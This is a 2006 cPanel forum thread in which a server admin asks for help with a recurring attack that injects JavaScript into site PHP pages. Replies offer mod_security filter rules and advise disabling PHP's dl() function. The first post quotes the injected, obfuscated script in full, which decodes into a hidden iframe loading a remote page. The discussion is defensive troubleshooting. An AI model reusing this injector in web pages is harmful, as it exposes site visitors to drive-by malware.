The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Recurring PHP malicious document.write exploit

Discussion in 'General Discussion' started by mousepotatoe, Mar 24, 2006.

  1. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    On my server, several sites but not all sites are having this code inserted into php pages, mainly index.php header.php or footer.php

    I cannot locate the source of this exploit.

    Is anyone familiar with this? code follows

    Code:
    <script language=javascript>
    document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286FLIUDPH%2853%2853vuf%286G%2855kwws%286D22zzz1vn%7Cv1frp2nlso1sks%2855%2853zlgwk%286G5%2853khljkw%286G5%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2LIUDPH%286H3')
    </script>
    any help would be greatly appreciated
     
  2. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Id suggest mod_security, and my mod security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


    To block those with modsec,
    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    My script contains around 30+ Javascript + XML cross site scripting code blocks.
     
  3. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    Mod security will block the requests that you filter, but the real issue is probably that the mailicious php module is still being loaded via the dl() function.

    Just edit your php.ini file and change

    enable_dl = yes

    to
    enable_dl = no

    And restart apache - the problem won't reoccur then.
     
  4. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Shouldn't it be:

    enable_dl = On
    enable_dl = Off
     
  5. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Thats a wonderful mod_security ruleset, and thank you for writing the lines:

    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    I have added this to my modsec ruleset, but the malicious code is creating
    "<script language=javascript>"

    would this mod_security recognize <script language=javascript> as <script> ?

    Thanks!
     
  6. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    enable_dl = no blocks ioncube

    If i change enable_dl = no all my ioncube sites go down, will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

    Thank you!
     
  7. Etheral

    Etheral Well-Known Member

    Joined:
    Dec 8, 2003
    Messages:
    208
    Likes Received:
    0
    Trophy Points:
    16

    you might NOT want to block javascript like that, some people use javascript to give there website a more interactive feel...
     
  8. tolra

    tolra Active Member

    Joined:
    Mar 4, 2006
    Messages:
    27
    Likes Received:
    0
    Trophy Points:
    1
    You can load the ioncube loaders within php.ini see the bottom of http://www.ioncube.com/loader_installation.php under "Manual Installation in the php.ini File", then you can disable dl.
     
  9. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    You have no idea what you're talking about. I suggest you find out what mod_security is, and why the comment you made makes no sense. It blocks URL requests, not page code. :rolleyes: :rolleyes:
     
  10. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    Yes,

    enable_dl = Off

    Is what you want - I was working from memory, it's as simple as that to disable this exploit.

    Enabling dl() makes your server vulnerable to any account loading a rogue mdule into php - load ioncube and any other legitimate modules (such as sourceguardian) into php.ini yourself, as someone mentioned.
     
  11. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Disabled dl() and cant run source guardian

    Disabling the dl() function is wreaking havoc on many of my websites. I had to load ioncube into the php.ini and got past that, and have added source guardian to php.ini but am getting the following error.

    I have tried

    and
    with no luck.
    Any suggestions?

    Thank you
     
Loading...

Share This Page